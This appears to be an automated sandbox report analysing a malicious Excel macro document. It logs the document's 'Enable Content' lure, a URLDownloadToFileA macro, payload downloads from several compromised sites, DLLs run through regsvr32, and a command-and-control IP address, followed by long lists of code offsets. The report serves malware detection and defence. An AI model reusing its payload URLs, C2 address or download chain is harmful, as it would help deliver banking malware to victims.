                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                      Source: regsvr32.exe, 00000004.00000002.1223353771.0000000000310000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                      Source: regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                      Source: regsvr32.exe, 00000004.00000002.1223285742.00000000002D3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223623480.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223353489.0000000000309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/
                      Source: regsvr32.exe, 00000009.00000002.1223353489.0000000000309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/;
                      Source: regsvr32.exe, 00000007.00000002.1223623480.0000000002E20000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223280961.00000000002C9000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223353489.0000000000309000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                      Source: regsvr32.exe, 00000004.00000002.1223353771.0000000000310000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1223615758.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1223638195.0000000002E2F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000002.1223643995.0000000002EA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lJWa95VlQ[1]Jump to behavior
                      Source: unknownDNS traffic detected: queries for: vipteck.com
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B24 InternetReadFile,4_2_0000000180006B24
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/iMc/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: airliftlimo.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vipteck.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /tgroup.ge/x4bc2kL4BzGAeUsVi/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: salledemode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kabeonet.plConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /wp-admin/VWlAz5vWJNHDb/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.kabeonet.plConnection: Keep-Alive
                      Source: unknownHTTPS traffic detected: 188.114.97.10:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 159.203.19.2:443 -> 192.168.2.22:49176 version: TLS 1.2

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 7.2.regsvr32.exe.1f00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.1f00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.2c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.1f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2010000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.2010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.1f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.925945389.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.936818785.0000000002010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1223804747.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1223146291.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.936929041.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.943746358.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1223136184.00000000001C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1223965620.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1223736851.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.943475793.00000000002C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1223393241.0000000001F00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: Screenshot number: 4Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
                      Source: Screenshot number: 4Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
                      Source: Screenshot number: 8Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 :: "7?
                      Source: Screenshot number: 8Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 :: "7?. 19 20 21 22 23 24
                      Source: melimar.com.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: melimar.com.xlsMacro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dllJump to dropped file
                      Source: melimar.com.xlsInitial sample: EXEC
                      Source: melimar.com.xlsInitial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\system32\HtkzwckLMRsIno\Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D212B03_2_000007FEF9D212B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25E013_2_000007FEF9D25E01
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D25CAD3_2_000007FEF9D25CAD
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D268503_2_000007FEF9D26850
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2443C3_2_000007FEF9D2443C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D253FB3_2_000007FEF9D253FB
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D24A703_2_000007FEF9D24A70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003B00003_2_003B0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180005C743_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002ACE83_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800201183_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000359C3_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E99C3_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800196283_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180025A4C3_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B7B23_2_000000018002B7B2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800094083_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180023C143_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800064143_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002582C3_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B8343_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000403C3_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800214443_2_0000000180021444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800120443_2_0000000180012044
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800160543_2_0000000180016054
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001705C3_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800018703_2_0000000180001870
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F8783_2_000000018001F878
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800144843_2_0000000180014484
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800154943_2_0000000180015494
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000BC983_2_000000018000BC98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180008C9C3_2_0000000180008C9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800078A43_2_00000001800078A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F0A83_2_000000018001F0A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E4AC3_2_000000018001E4AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800048B03_2_00000001800048B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001ACB43_2_000000018001ACB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800090B43_2_00000001800090B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800270C03_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800024C03_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800280C83_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800050D43_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800234D83_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800150F03_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800125003_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800241043_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A10C3_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180028D103_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A5243_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002D283_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E1303_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800291343_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800081343_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800221403_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800069543_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F5543_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002B5643_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800121683_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135683_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800245703_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800191783_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800251803_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800019803_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800215883_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001A9883_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800181903_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800139943_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800289983_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800061A03_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135A63_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016DA83_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800059AC3_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800135B43_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001C1B83_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800025B83_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800085BC3_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800015C03_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800295C83_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800229CC3_2_00000001800229CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000E5D43_2_000000018000E5D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002A5D83_2_000000018002A5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800261E03_2_00000001800261E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800079EC3_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800236243_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800186283_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180017E2C3_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800176383_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004E3C3_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020E403_2_0000000180020E40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015A643_2_0000000180015A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800152643_2_0000000180015264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A26C3_2_000000018000A26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800076783_2_0000000180007678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001667C3_2_000000018001667C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800126803_2_0000000180012680
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180001E883_2_0000000180001E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000968C3_2_000000018000968C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800222903_2_0000000180022290
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026A903_2_0000000180026A90
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000529C3_2_000000018000529C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180020AA03_2_0000000180020AA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180022AAC3_2_0000000180022AAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180007EB43_2_0000000180007EB4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800162BC3_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800252C03_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001AEC83_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001F6DC3_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800026DC3_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180002ADC3_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001E2F43_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180016AF43_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DEF43_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001DEFC3_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800063083_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001370C3_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180004B183_2_0000000180004B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015F243_2_0000000180015F24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006B243_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000F3283_2_000000018000F328
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800217383_2_0000000180021738
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002AF383_2_000000018002AF38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800283483_2_0000000180028348
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000DB4C3_2_000000018000DB4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180014F503_2_0000000180014F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000B3503_2_000000018000B350
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000A7583_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018002975C3_2_000000018002975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800243703_2_0000000180024370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800083703_2_0000000180008370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800157743_2_0000000180015774
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800123783_2_0000000180012378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180026B983_2_0000000180026B98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001CF9C3_2_000000018001CF9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001EBA03_2_000000018001EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018001B3A43_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D7AC3_2_000000018000D7AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800053B03_2_00000001800053B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180015BB83_2_0000000180015BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800207BC3_2_00000001800207BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000FFC03_2_000000018000FFC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00000001800173DC3_2_00000001800173DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180018BDC3_2_0000000180018BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_001300004_2_00130000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000C8194_2_000000018000C819
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800196284_2_0000000180019628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180025A4C4_2_0000000180025A4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001705C4_2_000000018001705C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800128644_2_0000000180012864
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180005C744_2_0000000180005C74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B04_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800252C04_2_00000001800252C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800024C04_2_00000001800024C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006B244_2_0000000180006B24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C4_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000A7584_2_000000018000A758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800245704_2_0000000180024570
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E99C4_2_000000018000E99C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001B3A44_2_000000018001B3A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800079EC4_2_00000001800079EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800094084_2_0000000180009408
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180023C144_2_0000000180023C14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800064144_2_0000000180006414
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800236244_2_0000000180023624
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800186284_2_0000000180018628
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002582C4_2_000000018002582C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180017E2C4_2_0000000180017E2C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B8344_2_000000018000B834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800176384_2_0000000180017638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000403C4_2_000000018000403C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004E3C4_2_0000000180004E3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180020E404_2_0000000180020E40
